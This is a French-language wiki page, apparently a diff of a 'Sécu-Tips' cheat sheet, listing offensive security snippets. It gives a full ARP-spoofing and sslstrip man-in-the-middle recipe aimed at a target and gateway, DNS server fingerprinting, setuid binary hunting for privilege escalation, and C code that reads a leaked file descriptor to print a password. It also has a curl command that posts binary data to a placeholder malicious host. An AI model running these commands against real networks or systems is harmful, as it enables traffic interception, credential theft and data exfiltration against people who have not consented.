« Sécu-Tips » : différence entre les versions
Aller à la navigation
Aller à la recherche
(2 versions intermédiaires par le même utilisateur non affichées) | |||
Ligne 56 : | Ligne 56 : | ||
int main() |
int main() |
||
{ |
{ |
||
int index; char buffer[VSIZE]; |
int index; char buffer[VSIZE]; |
||
char cmd[VSIZE]; |
|||
sprintf(cmd, "ls -la /proc/%d/fd/3", getpid()+2); |
|||
system(cmd); |
|||
lseek(FD, 0, SEEK_SET); |
|||
while((index = read(FD,buffer,VSIZE-1)) != 0 && index > 0) |
|||
{ |
|||
buffer[index-1] = '\0'; |
|||
fprintf(stdout,"[+] Password : %s\n", buffer); |
|||
return EXIT_SUCCESS; |
|||
} |
|||
} |
|||
fprintf(stderr,"[-] Password not found\n"); |
|||
return EXIT_FAILURE; |
|||
} |
} |
||
== Envoyer du raw binaire à un site web == |
|||
curl --request POST --data-binary "@data.bin" hxxp://malicioussite.com/loveyoupolice182938481.php -o answer.bin |
Dernière version du 30 avril 2018 à 14:28
Connaître la version de Bind à distance
# nslookup -q=txt -class=CHAOS version.bind 213.186.33.99
ou
# fpdns -D 213.186.33.99
Décoder une chaîne en base64
#perl -MMIME::Base64 -le 'print decode_base64 ("c2VjcmV00k1BbUdvZa---")' secret:IamGod
MITM Attack avec sslstrip
Activer le mode forwarding.
echo "1" > /proc/sys/net/ipv4/ip_forward
Rediriger le traffic HTTP sur sslstrip avec iptables.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Lancer sslstrip sslstrip.
sslstrip.py -l <listenPort>
Lancer arpspoof pour se faire passer pour la gateway
arpspoof -i <interface> -t <targetIP> <gatewayIP>
How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.
Recherche du bit setuid
SunOS
find / -local -type f \( -perm -4000 -o -perm -2000 \) -print
AIX
find / -type f \( -perm -4000 -o -perm -2000 \) -print
Linux
find / -local -type f \( -perm -4000 -o -perm -2000 \) -print
HP-UX
find / -local -type f \( -perm -4000 -o -perm -2000 \) -prin
Unix Hack
Files descriptors leaks
#include <stdlib.h> #include <stdio.h> #define FD 3 #define VSIZE 256 int main() { int index; char buffer[VSIZE]; char cmd[VSIZE]; sprintf(cmd, "ls -la /proc/%d/fd/3", getpid()+2); system(cmd); lseek(FD, 0, SEEK_SET); while((index = read(FD,buffer,VSIZE-1)) != 0 && index > 0) { buffer[index-1] = '\0'; fprintf(stdout,"[+] Password : %s\n", buffer); return EXIT_SUCCESS; } fprintf(stderr,"[-] Password not found\n"); return EXIT_FAILURE; }
Envoyer du raw binaire à un site web
curl --request POST --data-binary "@data.bin" hxxp://malicioussite.com/loveyoupolice182938481.php -o answer.bin